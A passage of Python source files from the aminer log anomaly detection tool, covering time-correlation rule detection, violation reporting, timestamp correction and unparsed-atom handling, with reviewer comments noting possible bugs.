KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis import Rules from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import get_log_int from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class TimeCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class tries to find time correlation patterns between different log atoms. 
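When a possible correlation rule is detected, it creates an event including the rules.
    This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006.
    """

time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

def __init__(self, aminer_config, anomaly_event_handlers, parallel_check_count, persistence_id='Default', record_count_before_event=10000,
             output_logline=True, use_path_match=True, use_value_match=True, min_rule_attributes=1, max_rule_attributes=5):
    """
    Initialize the detector. This will also trigger reading or creation of persistence storage location.

    @param aminer_config configuration from analysis_context.
    @param anomaly_event_handlers for handling events, e.g., print events to stdout.
    @param parallel_check_count number of rule detection checks to run in parallel.
    @param persistence_id name of persistence file.
    @param record_count_before_event number of events used to calculate statistics (i.e., window size)
    @param output_logline specifies whether the full parsed log atom should be provided in the output.
    @param min_rule_attributes minimum number of attributes forming a rule
    @param max_rule_attributes maximum number of attributes forming a rule
    @param use_path_match if true rules are build based on path existence
    @param use_value_match if true rules are built based on actual values
    """
    self.next_persist_time, self.log_success, self.log_total = [None]*3
    super().__init__(
        aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, parallel_check_count=parallel_check_count,
        persistence_id=persistence_id, record_count_before_event=record_count_before_event, output_logline=output_logline,
        use_path_match=use_path_match, use_value_match=use_value_match, min_rule_attributes=min_rule_attributes,
        max_rule_attributes=max_rule_attributes
    )
    self.last_timestamp = 0.0
    self.last_unhandled_match = None
    self.total_records = 0
    # The feature list and both statistics tables are always created, whether or not a persistence file is found,
    # so receive_atom() can rely on them in every case. Both tables hold parallel_check_count x parallel_check_count
    # entries of two cells each; update_tables_for_feature() and analysis_status_to_string() index them that way.
    self.feature_list = []
    self.event_count_table = [0] * parallel_check_count * parallel_check_count * 2
    self.event_delta_table = [0] * parallel_check_count * parallel_check_count * 2
    self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
    PersistenceUtil.add_persistable_component(self)
    persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
    if persistence_data is not None:
        # NOTE(review): loaded data is not applied to any attribute, and do_persist() of this class only writes a
        # log message, so the content of such a file is unspecified here — confirm whether restoring state is intended.
        logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

def receive_atom(self, log_atom):
    """
    Receive a log atom from a source.

    Atoms with a timestamp older than the last one seen are reported as unsorted and otherwise ignored. Every other
    atom is matched against the current features; while fewer than parallel_check_count features exist, a new random
    rule may be created from it. Every record_count_before_event records a 'Correlation report' event is emitted and
    the statistics are reset.
    @param log_atom the log atom to process.
    """
    self.log_total += 1
    event_data = {}
    timestamp = log_atom.get_timestamp()
    if timestamp is None:
        timestamp = time.time()
    if timestamp < self.last_timestamp:
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', f'Logdata not sorted: last {self.last_timestamp}, current {timestamp}',
                                   [log_atom.parser_match.match_element.annotate_match('')], event_data, log_atom, self)
        return
    self.last_timestamp = timestamp
    self.total_records += 1
    features_found_list = []
    for feature in self.feature_list:
        if feature.rule.match(log_atom):
            feature.trigger_count += 1
            self.update_tables_for_feature(feature, timestamp)
            features_found_list.append(feature)
    if len(self.feature_list) < self.parallel_check_count:
        # In half of the cases the new rule is derived from the last atom no feature matched instead of the current one.
        if (random.randint(0, 1) != 0) and (self.last_unhandled_match is not None):
            log_atom = self.last_unhandled_match
        new_rule = self.create_random_rule(log_atom)
        if new_rule is not None:
            new_feature = CorrelationFeature(new_rule, len(self.feature_list), timestamp)
            self.feature_list.append(new_feature)
            new_feature.trigger_count = 1
            self.update_tables_for_feature(new_feature, timestamp)
            features_found_list.append(new_feature)
    for feature in features_found_list:
        feature.last_trigger_time = timestamp
    if not features_found_list:
        self.last_unhandled_match = log_atom
    if (self.total_records % self.record_count_before_event) == 0:
        # NOTE(review): total_records is not reset anywhere visible here, so this list of empty strings (handed to the
        # handlers as the log lines) grows with every report while only result[0] carries content — confirm intent.
        result = self.total_records * ['']
        result[0] = self.analysis_status_to_string()
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary()),
                              'AffectedLogAtomValues': [log_atom.raw_data.decode(AminerConfig.ENCODING)]}
        if self.output_logline:
            feature_list = []
            for feature in self.feature_list:
                tmp_list = {}
                r = self.rule_to_dict(feature.rule)
                tmp_list['Rule'] = r
                tmp_list['Index'] = feature.index
                tmp_list['CreationTime'] = feature.creation_time
                tmp_list['LastTriggerTime'] = feature.last_trigger_time
                tmp_list['TriggerCount'] = feature.trigger_count
                feature_list.append(tmp_list)
            analysis_component['FeatureList'] = feature_list
        analysis_component['AnalysisStatus'] = result[0]
        analysis_component['TotalRecords'] = self.total_records
        event_data['AnalysisComponent'] = analysis_component
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Correlation report', result, event_data, log_atom, self)
        self.reset_statistics()
        logging.getLogger(DEBUG_LOG_NAME).debug("%s ran analysis.", self.__class__.__name__)
    self.log_success += 1

def rule_to_dict(self, rule):
    """Convert a rule to a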
dict structure."""
    # NOTE(review): every list-valued attribute is emitted under the key 'subRules' (the attribute name is lost and a
    # later list overwrites an earlier one) and each element is converted as if it were a rule object — confirm that
    # list attributes only ever hold rule objects.
    r = {'type': str(rule.__class__.__name__)}
    for var in vars(rule):
        attr = getattr(rule, var, None)
        if attr is None:
            r[var] = None
        elif isinstance(attr, list):
            tmp_list = []
            for v in attr:
                d = self.rule_to_dict(v)
                d['type'] = str(v.__class__.__name__)
                tmp_list.append(d)
            r['subRules'] = tmp_list
        else:
            # Other attributes (e.g. match values) are copied as they are.
            r[var] = attr
    return r

def do_timer(self, trigger_time):
    """
    Check if current ruleset should be persisted.

    @param trigger_time the time the timer fired.
    @return seconds until the next call is wanted: the remaining part of the persistence period, or the full period
    when the state was just persisted or no persistence run is scheduled yet.
    """
    if self.next_persist_time is None:
        return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
    delta = self.next_persist_time - trigger_time
    if delta <= 0:
        self.do_persist()
        delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.next_persist_time = time.time() + delta
    return delta

def do_persist(self):
    """
    Immediately write persistence data to storage.

    NOTE(review): only a debug message is written; no state of this detector is stored, so a restart always begins
    with empty features and statistics — confirm whether that is intended.
    """
    logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

def create_random_rule(self, log_atom):
    """
    Create a random existing path rule or value match rule.

    Picks min_rule_attributes + get_log_int(max_rule_attributes - min_rule_attributes) distinct parsed paths of the
    atom at random and builds one sub rule per path; attributes holding parsed date values are skipped.
    @param log_atom the atom whose parser match supplies the candidate paths and values.
    @return an AndMatchRule over several sub rules, the single sub rule, or None if no rule could be built.
    """
    parser_match = log_atom.parser_match
    sub_rules = []
    all_keys = list(parser_match.get_match_dictionary().keys())
    attribute_count = self.min_rule_attributes + get_log_int(self.max_rule_attributes - self.min_rule_attributes)
    while attribute_count > 0:
        # NOTE(review): randint(0, -1) raises ValueError if the match dictionary is empty on entry — confirm that
        # every atom reaching this point has at least one parsed path.
        key_pos = random.randint(0, len(all_keys) - 1)
        key_name = all_keys[key_pos]
        # Drop the chosen key so no path is used twice within one rule.
        all_keys = all_keys[:key_pos] + all_keys[key_pos + 1:]
        key_value = parser_match.get_match_dictionary().get(key_name).match_object
        # Not much sense handling parsed date values in this implementation, so just ignore this attribute.
if (isinstance(key_value, tuple)) and (isinstance(key_value[0], datetime)):
            if not all_keys:
                break
            continue
        attribute_count -= 1
        rule_type = 1  # default is value_match only if none specified
        if self.use_path_match and not self.use_value_match:
            rule_type = 0
        if not self.use_path_match and self.use_value_match:
            rule_type = 1
        if self.use_path_match and self.use_value_match:
            rule_type = random.randint(0, 1)
        if rule_type == 0:
            sub_rules.append(Rules.PathExistsMatchRule(key_name))
        elif rule_type == 1:
            sub_rules.append(Rules.ValueMatchRule(key_name, key_value))
        else:
            # Unreachable with the assignments above (rule_type is always 0 or 1); kept as a guard.
            msg = 'Invalid rule type'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not all_keys:
            # No candidate paths left, even if fewer than attribute_count sub rules were built.
            break
    if len(sub_rules) > 1:
        return Rules.AndMatchRule(sub_rules)
    if len(sub_rules) > 0:
        return sub_rules[0]
    return None

def update_tables_for_feature(self, target_feature, timestamp):
    """
    Assume that this event was the effect of a previous cause-related event.

    Loop over all cause-related features (rows) to search for matches.
"""
    # Both tables are laid out as parallel_check_count rows of parallel_check_count two-cell entries (see __init__).
    # First pass: walk the column of target_feature on the even cells, stepping one full row per feature.
    feature_table_pos = (target_feature.index << 1)
    for feature in self.feature_list:
        delta = timestamp - feature.last_trigger_time
        # Only features whose last trigger lies at most 10 seconds back are counted.
        if delta <= 10.0:
            self.event_count_table[feature_table_pos] += 1
            self.event_delta_table[feature_table_pos] += int(delta * 1000)
        feature_table_pos += (self.parallel_check_count << 1)
    # Second pass: walk the row of target_feature on the odd cells, stepping one entry per feature; the delta is accumulated negated.
    feature_table_pos = ((target_feature.index * self.parallel_check_count) << 1) + 1
    for feature in self.feature_list:
        delta = timestamp - feature.last_trigger_time
        if delta <= 10.0:
            self.event_count_table[feature_table_pos] += 1
            self.event_delta_table[feature_table_pos] -= int(delta * 1000)
        feature_table_pos += 2

def analysis_status_to_string(self):
    """
    Get a string representation of all features.

    For every feature one header line is written, followed by one line per feature index showing both cells of the
    entry: count c, ratio r (count / trigger count) and mean delta dt in seconds.
    @return the multi-line report string, empty if there are no features.
    """
    result = ''
    for feature in self.feature_list:
        trigger_count = feature.trigger_count
        result += f'{feature.rule} ({feature.index}) e = {trigger_count}:'
        stat_pos = (self.parallel_check_count * feature.index) << 1
        for feature_pos in range(len(self.feature_list)):  # skipcq: PTC-W0060
            event_count = self.event_count_table[stat_pos]
            ratio = '-'
            if trigger_count != 0:  # skipcq: PYL-C0209
                ratio = '%.2e' % (float(event_count) / trigger_count)
            delta = '-'
            if event_count != 0:  # skipcq: PYL-C0209
                # Deltas are accumulated in milliseconds, hence the factor 0.001.
                delta = '%.2e' % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count)  # skipcq: PYL-C0209
            result += '\n %d: {c = %#6d r = %s dt = %s' % (feature_pos, event_count, ratio, delta)
            stat_pos += 1
            event_count = self.event_count_table[stat_pos]
            ratio = '-'
            if trigger_count != 0:  # skipcq: PYL-C0209
                ratio = '%.2e' % (float(event_count) / trigger_count)
            delta = '-'
            if event_count != 0:  # skipcq: PYL-C0209
                delta = '%.2e' % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count)  # skipcq: PYL-C0209
            result += ' c = %#6d r = %s dt = %s}' % (event_count, ratio, delta)
            stat_pos += 1
        result += '\n'
    return result

def reset_statistics(self):
    """Reset all features; the two statistics tables are re-created as well."""
    for feature in self.feature_list:
        feature.creation_time = 0
        feature.last_trigger_time = 0
        feature.trigger_count = 0
self.event_count_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 self.event_delta_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 class CorrelationFeature: """This class defines a correlation feature.""" def __init__(self, rule, index, creation_time): self.rule = rule self.index = index self.creation_time = creation_time self.last_trigger_time = 0.0 self.trigger_count = 0 TimeCorrelationViolationDetector.py000066400000000000000000000422361437606560100400130ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for time correlation rules. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, build_persistence_file_name, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import LogarithmicBackoffHistory from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.analysis import Rules class TimeCorrelationViolationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class creates events when one of the given time correlation rules is violated. 
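This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, ruleset, anomaly_event_handlers, persistence_id='Default', output_logline=True):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param ruleset a list of MatchRule rules with appropriate CorrelationRules attached as actions.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        """
        self.next_persist_time, self.log_success, self.log_total = [None]*3
        super().__init__(
            aminer_config=aminer_config, ruleset=ruleset, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id,
            output_logline=output_logline
        )
        self.last_log_atom = None
        # Collect every CorrelationRule referenced by the actions of the ruleset exactly once. A dict is used as the
        # de-duplicating container so the order follows the ruleset and is the same on every run; a set of rule objects
        # would be ordered by their ids and make the order of reported violations differ from run to run.
        event_correlation_rules = {}
        for rule in self.ruleset:
            if rule.match_action.artefact_a_rules is not None:
                event_correlation_rules.update(dict.fromkeys(rule.match_action.artefact_a_rules))
            if rule.match_action.artefact_b_rules is not None:
                event_correlation_rules.update(dict.fromkeys(rule.match_action.artefact_b_rules))
        self.event_correlation_ruleset = list(event_correlation_rules)
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)

    def receive_atom(self, log_atom):
        """
        Receive a parsed atom and evaluate all the classification rules and event triggering on violations.

        The atom is remembered as last_log_atom; do_timer() attaches violation events to it.
        @param log_atom the parsed atom to match against every rule of the ruleset.
        """
        self.log_total += 1
        self.last_log_atom = log_atom
        for rule in self.ruleset:
            rule.match(log_atom)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check for any rule violations and if the current ruleset should be persisted.

        @param trigger_time the time the timer fired; it is also set as timestamp of last_log_atom for violation events.
        @return 10.0
        """
        # Persist the state only quite infrequently: As most correlation rules react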
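# in timeline of seconds, the persisted data will most
        # likely be unsuitable to catch lost events. So persistence is mostly to capture the correlation rule context, e.g. the history
        # of loglines matched before.
        # A next_persist_time that is still None (nothing scheduled yet) is treated as due: the state is persisted and the
        # next run is scheduled one period ahead instead of failing on the subtraction with None.
        if self.next_persist_time is None or self.next_persist_time - trigger_time <= 0:
            self.do_persist()
            self.next_persist_time = time.time() + self.aminer_config.config_properties.get(
                KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        # Check all correlation rules, generate single events for each violated rule, possibly containing multiple records. As we might
        # be processing historic data, the timestamp last seen is unknown here. Hence, rules not receiving newer events might not notice
        # for a long time, that they hold information about correlation impossible to fulfil. Take the newest timestamp of any rule
        # and use it for checking.
        newest_timestamp = 0.0
        for rule in self.event_correlation_ruleset:
            newest_timestamp = max(newest_timestamp, rule.last_timestamp_seen)
        for rule in self.event_correlation_ruleset:
            check_result = rule.check_status(newest_timestamp)
            if check_result is None:
                continue
            # NOTE(review): the timestamp of the last received atom is overwritten with the timer time and the same atom
            # is reused for every violation; last_log_atom is None until the first atom arrived — confirm that
            # check_status() cannot report a violation before then.
            self.last_log_atom.set_timestamp(trigger_time)
            r = {'RuleId': rule.rule_id, 'MinTimeDelta': rule.min_time_delta, 'MaxTimeDelta': rule.max_time_delta,
                 'ArtefactMatchParameters': rule.artefact_match_parameters, 'HistoryAEvents': rule.history_a_events,
                 'HistoryBEvents': rule.history_b_events, 'LastTimestampSeen': rule.last_timestamp_seen}
            history = {'MaxItems': rule.correlation_history.max_items}
            h = []
            for item in rule.correlation_history.history:
                h.append(repr(item))
            history['History'] = h
            r['correlation_history'] = history
            analysis_component = {'Rule': r, 'CheckResult': check_result, 'NewestTimestamp': newest_timestamp}
            event_data = {'AnalysisComponent': analysis_component}
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f'Analysis.{self.__class__.__name__}', f'Correlation rule "{rule.rule_id}" violated', [check_result[0]],
                                       event_data, self.last_log_atom, self)
        return 10.0

    def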
do_persist(self): """Immediately write persistence data to storage.""" logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.ruleset): rule.log_statistics(component_name + '.' + rule.__class__.__name__ + str(i)) class EventClassSelector(Rules.MatchAction): """This match action selects one event class by adding it to a MatchRule. It then triggers the appropriate CorrelationRules.""" def __init__(self, action_id, artefact_a_rules, artefact_b_rules): self.action_id = action_id self.artefact_a_rules = artefact_a_rules self.artefact_b_rules = artefact_b_rules def match_action(self, log_atom): """ Invoke if a rule has matched. @param log_atom the parser match_element that was also matching the rules. """ if self.artefact_a_rules is not None: for a_rule in self.artefact_a_rules: a_rule.update_artefact_a(self, log_atom) if self.artefact_b_rules is not None: for b_rule in self.artefact_b_rules: b_rule.update_artefact_b(self, log_atom) class CorrelationRule: """ This class defines a correlation rule to match artefacts A and B. A hidden event A* always triggers at least one artefact A and the hidden event B*, thus triggering also at least one artefact B. """ def __init__(self, rule_id, min_time_delta, max_time_delta, artefact_match_parameters=None): """ Create the correlation rule. @param rule_id a unique identifier of the rule. @param min_time_delta minimal delta in seconds, that artefact B may be observed after artefact A. Negative values are allowed as artefact B may be found before A. @param max_time_delta maximum delta in seconds, that artefact B may be observed after artefact A. 
Negative values are allowed as artefact B may be found before A. @param artefact_match_parameters if not none, two artefacts A and B will be only treated as correlated when all the parsed artefact attributes identified by the list of attribute path tuples match. """ self.rule_id = rule_id self.min_time_delta = min_time_delta self.max_time_delta = max_time_delta self.artefact_match_parameters = artefact_match_parameters self.history_a_events = [] self.history_b_events = [] self.last_timestamp_seen = 0.0 self.correlation_history = LogarithmicBackoffHistory(10) def update_artefact_a(self, selector, log_atom): """Append entry to the event history A.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event A could be discarded immediately. self.history_a_events.append(history_entry) def update_artefact_b(self, selector, log_atom): """Append entry to the event history B.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event B could be discarded immediately. self.history_b_events.append(history_entry) def check_status(self, newest_timestamp, max_violations=20): """@return None if status is OK. Return a tuple containing a descriptive message and a list of violating log data lines on error.""" # This part of code would be good target to be implemented as native library with optimized algorithm in future. a_pos = 0 check_range = len(self.history_a_events) violation_logs = [] violation_message = '' num_violations = 0 while a_pos < check_range: deleted = False check_range = len(self.history_a_events) a_event = self.history_a_events[a_pos] if a_event is None: continue a_event_time = a_event[0] b_pos = 0 while b_pos < len(self.history_b_events): b_event = self.history_b_events[b_pos] if b_event is None: continue b_event_time = b_event[0] delta = b_event_time - a_event_time if delta < self.min_time_delta: # See if too early, if yes go to next element. 
As we will not check again any older aEvents in this loop, skip # all bEvents up to this position in future runs. if b_pos < len(self.history_b_events): violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was found too' \ f' early!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break continue # Too late, no other b_event may match this a_event if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({ a_event[2].action_id}) was not found in' \ f' time!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break # So time range is OK, see if match parameters are also equal. 
violation_found = False for check_pos in range(4, len(a_event)): # skipcq: PTC-W0060 if a_event[check_pos] != b_event[check_pos]: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: \"{violation_line}\" ({a_event[2].action_id}) {a_event[check_pos]} is not' \ f' equal {b_event[check_pos]}\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 violation_found = True break check_pos = check_pos + 1 if violation_found: continue # We want to keep a history of good matches to ease diagnosis of correlation failures. Keep information about current line # for reference. self.correlation_history.add_object((a_event[3].match_element.match_string, a_event[2].action_id, b_event[3].match_element.match_string, b_event[2].action_id)) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 b_pos = b_pos + 1 if deleted is False: a_pos = a_pos + 1 # After checking all aEvents before a_pos were cleared, otherwise they violate a correlation rule. for a_pos in range(0, check_range): a_event = self.history_a_events[a_pos] if a_event is None: continue delta = newest_timestamp - a_event[0] if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was not found in time!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break if num_violations > max_violations: violation_message += f'... 
({num_violations - max_violations} more)\n' if num_violations != 0 and len(self.correlation_history.get_history()) > 0: violation_message += 'Historic examples:\n' for record in self.correlation_history.get_history(): violation_message += f' "{record[0].decode()}" ({record[1]}) ==> "{record[2].decode()}" ({record[3]})\n' if num_violations == 0: return None return violation_message, violation_logs def prepare_history_entry(self, selector, log_atom): """Return a history entry for a parser match.""" parser_match = log_atom.parser_match timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() length = 4 if self.artefact_match_parameters is not None: length += len(self.artefact_match_parameters) result = [None] * length result[0] = timestamp result[1] = 0 result[2] = selector result[3] = parser_match if result[0] < self.last_timestamp_seen: msg = 'Timestamps unsorted!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.last_timestamp_seen = result[0] if self.artefact_match_parameters is not None: pos = 4 v_dict = parser_match.get_match_dictionary() for artefact_match_parameter in self.artefact_match_parameters: for param_path in artefact_match_parameter: match_element = v_dict.get(param_path, None) if match_element is not None: result[pos] = match_element.match_object pos += 1 return result TimestampCorrectionFilters.py000066400000000000000000000044101437606560100366500ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file collects various classes useful to filter and correct the timestamp associated with a received parsed atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SimpleMonotonicTimestampAdjust(AtomHandlerInterface): """ Handlers of this class compare the timestamp of a newly received atom with the largest timestamp seen so far. When below, the timestamp of this atom is adjusted to the largest value seen, otherwise the largest value seen is updated. """ def __init__(self, subhandler_list, stop_when_handled_flag=False): # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) self.latest_timestamp_seen = 0 def receive_atom(self, log_atom): """ Pass the atom to the subhandlers. @return false when no subhandler was able to handle the atom. """ self.log_total += 1 if log_atom.get_timestamp() is not None: if log_atom.get_timestamp() < self.latest_timestamp_seen: log_atom.set_timestamp(self.latest_timestamp_seen) else: self.latest_timestamp_seen = log_atom.get_timestamp() result = False for handler, _ in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True if self.stop_when_handled_flag: break if result: self.log_success += 1 return result TimestampsUnsortedDetector.py000066400000000000000000000075251437606560100367020ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for unsorted timestamps. 
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os from aminer.input.InputInterfaces import AtomHandlerInterface from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class TimestampsUnsortedDetector(AtomHandlerInterface): """ This class creates events when unsorted timestamps are detected. This is useful mostly to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. """ def __init__(self, aminer_config, anomaly_event_handlers, exit_on_error_flag=False, output_logline=True): """ Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param exit_on_error_flag exit the aminer forcefully if a log atom with a wrong timestamp is found. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, exit_on_error_flag=exit_on_error_flag, output_logline=output_logline ) self.last_timestamp = 0 def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. 
@param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. Depending on this information, the caller may decide if it makes sense passing the parsed atom also to other handlers. """ self.log_total += 1 if log_atom.get_timestamp() is None: return False if log_atom.get_timestamp() < self.last_timestamp: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [original_log_line_prefix + data] analysis_component = {'LastTimestamp': self.last_timestamp} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Timestamp {datetime.fromtimestamp(log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} below " f"{datetime.fromtimestamp(self.last_timestamp).strftime('%Y-%m-%d %H:%M:%S')}", sorted_log_lines, event_data, log_atom, self) if self.exit_on_error_flag: import sys sys.exit(1) self.last_timestamp = log_atom.get_timestamp() self.log_success += 1 return True UnparsedAtomHandlers.py000066400000000000000000000061431437606560100354140ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a handler that forwards unparsed atoms to the event handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface from aminer import AminerConfig from aminer.parsing.MatchContext import DebugMatchContext class SimpleUnparsedAtomHandler(AtomHandlerInterface): """Handlers of this class will just forward the received unparsed atoms to the registered event handlers.""" def __init__(self, anomaly_event_handlers): """ Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers=anomaly_event_handlers) def receive_atom(self, log_atom): """Receive an unparsed atom to create events for each.""" if log_atom.is_parsed(): return False try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) self.send_event_to_handlers(data, log_atom) return True def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" event_data = {} for listener in self.anomaly_event_handlers: listener.receive_event('Input.UnparsedAtomHandler', 'Unparsed atom received', [data], event_data, log_atom, self) class VerboseUnparsedAtomHandler(SimpleUnparsedAtomHandler): """Handlers of this class will forward received unparsed atoms to the registered event handlers applying the DebugMatchContext.""" def __init__(self, anomaly_event_handlers, parsing_model): """ Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. 
